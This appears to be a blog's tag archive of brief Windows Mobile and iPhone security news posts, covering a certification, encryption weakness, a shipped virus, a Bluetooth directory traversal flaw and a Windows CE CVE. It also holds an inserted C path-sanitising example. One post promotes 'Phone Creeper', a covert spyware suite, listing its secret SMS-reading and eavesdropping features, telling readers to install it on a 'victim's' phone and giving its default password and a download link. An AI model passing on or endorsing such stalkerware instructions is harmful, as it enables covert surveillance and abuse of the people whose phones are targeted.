Posts Tagged ‘Security Vulnerability’

Australian DSD (Defence Signals Directorate) gives Windows Mobile 6.1 the thumbs up




The DSD is the Australian Government’s national authority for information security. The Windows Mobile 6.1 operating system has successfully completed the Defence Signals Directorate (DSD) Australasian Information Security Evaluation Program and has also obtained Common Criteria Evaluation Assurance Level 4 (EAL4). (EAL7 is the highest possible level.)

By meeting the security criteria for EAL4, Windows Mobile 6.1 is accepted under the Common Criteria Recognition Arrangement (CCRA) by Australia and 25 other countries worldwide, including the United Kingdom and the United States. The CCRA ensures that evaluations of IT products are performed to high and globally consistent standards. Thus, this certification provides government and enterprise customers with definitive information about the security features in Windows Mobile 6.1, and assurance that mobile workers can securely access sensitive data on information networks.

Mike Burgess, first assistant secretary, Information Security, Defence Signals Directorate, said, “We have worked very closely with Microsoft throughout this assessment process to ensure that Windows Mobile 6.1 meets the security needs for government and enterprise networks.”

via windowsteamblog.com

iPhone 3GS Encryption Is ‘Useless’ for Business!! Is it really?




Here is an iPhone story that many won’t tell you. Jonathan Zdziarski, an iPhone developer and hacker who teaches forensics courses on recovering data from iPhones, claims that the enterprise-friendly encryption included with the iPhone 3GS is so weak it can be cracked in two minutes with a few pieces of readily available freeware. In a recent report from wired.com he says, “It is kind of like storing all your secret messages right next to the secret decoder ring,” and goes on to say, “I don’t think any of us have ever seen encryption implemented so poorly before, which is why it’s hard to describe why it’s such a big threat to security.”

Get more info about the iPhone’s Encryption Flaws

O2 Toshiba TG01 Windows Mobile shipped with a virus !!!




According to MSMobile.com, the Toshiba TG01 Windows Mobile phone sold by O2 has a virus located on some of the memory cards delivered in the Toshiba TG01 package. The virus has infected only devices sold in July 2009; devices sold previously (sales of the Toshiba TG01 started at O2 Germany in June) are not affected. This is the first time that virus software has been encountered in a commercially sold Windows Mobile phone.

HTC WM6.1 and WM6 Bluetooth Vulnerability




HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. HTC handsets running Windows Mobile 5 are not affected. Because the driver, obexfile.dll, is an HTC driver, only handsets from the company are affected. Users worried about the vulnerability should avoid pairing their phones with an untrusted handset or computer. They may also want to delete any devices that are already paired with their phones. Apparently Windows Mobile 6.5 devices will be vulnerable too if HTC does not fix the driver, according to Moreno Tablado, who discovered this vulnerability.

[ via PC World ]

More info about the Vulnerability
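The missing check behind the OBEX FTP issue above is that a client-supplied name is never confined to the shared folder. The following is an added example, not HTC's driver code and not from the original post: a hypothetical helper, `obex_resolve`, that resolves a requested name against an assumed share root (`\Share`) and rejects any name whose `..` components would climb out of it, treating both `/` and `\` as separators.

```c
#include <stdio.h>
#include <string.h>

/* Added example: hypothetical helper, not the code in obexfile.dll.
 * Joins a client-supplied OBEX FTP name onto the share root. Returns 0 with
 * the resolved path in out, or -1 if the name would leave the share or the
 * result does not fit. Both '/' and '\\' are treated as separators. */
int obex_resolve(const char *root, const char *name, char *out, size_t outsz)
{
    size_t len = strlen(root);
    size_t floor = len;                      /* never pop below the root */
    if (len + 1 > outsz) return -1;
    memcpy(out, root, len + 1);

    const char *p = name;
    while (*p) {
        size_t n = strcspn(p, "/\\");        /* length of next component */
        if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (len == floor) return -1;     /* ".." would escape the share */
            while (len > floor && out[len - 1] != '\\') len--;
            out[--len] = '\0';               /* drop component and separator */
        } else if (n > 0 && !(n == 1 && p[0] == '.')) {
            if (len + 1 + n + 1 > outsz) return -1;
            out[len++] = '\\';
            memcpy(out + len, p, n);
            len += n;
            out[len] = '\0';
        }                                    /* empty and "." are skipped */
        p += n;
        if (*p) p++;                         /* step over the separator */
    }
    return 0;
}

int main(void)
{
    /* Constructed sample names; "\\Share" is an assumed share root. */
    const char *names[] = { "photos/a.jpg", "photos/../b.txt",
                            "../../Windows/x.dll", "photos\\..\\..\\Windows" };
    char buf[128];
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        int rc = obex_resolve("\\Share", names[i], buf, sizeof buf);
        printf("%-24s -> %s\n", names[i], rc == 0 ? buf : "REJECTED");
    }
    return 0;
}
```

A `..` that stays inside the share is resolved rather than refused, so the decision is made on the final path and not on the presence of the string `../`.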

Phone Creeper 0.3 – Espionage Application or Security Vulnerability?




Phone Creeper, which the author describes as an Espionage Suite, has recently been released by chetstriker from xda-developers. I am thankful to the developer for pointing out such a vulnerability within the Windows Mobile operating system.

Currently it has the following features:

  1. secretly and remotely read incoming / outgoing sms
  2. secretly and remotely delete incoming / outgoing sms
  3. secretly and remotely view call history
  4. bounce sms messages off remote phone to someone else.
  5. create a pop-up message on phone
  6. send a secret fart sound
  7. secretly and remotely listen to person. (Initiates silent call back of person to your phone with their speaker phone enabled)
  8. also send listening in call to somebody else’s phone

All results will be sent via SMS back without leaving any trace on the phone being controlled. Any cell phone can be used to initiate the commands and all commands will respond with a success message for acknowledgment.

Install Instructions:
Just install the .cab on the victim’s WM5 or higher phone. THEN MAKE SURE YOU REBOOT TO INITIATE IT.
By default the password is “chetstriker”, obviously not including the quotes, and BE SURE IT’S ALL IN LOWER CASE. The command format is (password and then command)

Download this Application

Security Vulnerability for Microsoft Windows CE 5.0


We don’t usually find a lot of security vulnerabilities on mobile devices when compared to their desktop cousins, but once in a while a few of them do surface.

A security vulnerability for Windows CE has been posted in the US-CERT Cyber Security Bulletin.

Multiple unspecified vulnerabilities in the JPEG (GDI+) and GIF image processing in Microsoft Windows CE 5.0 allow remote attackers to execute arbitrary code via crafted JPEG and GIF images.

For more details see National Vulnerability Database (CVE-2008-2160)

An update is available from Microsoft here.
Source: 4winmobile.com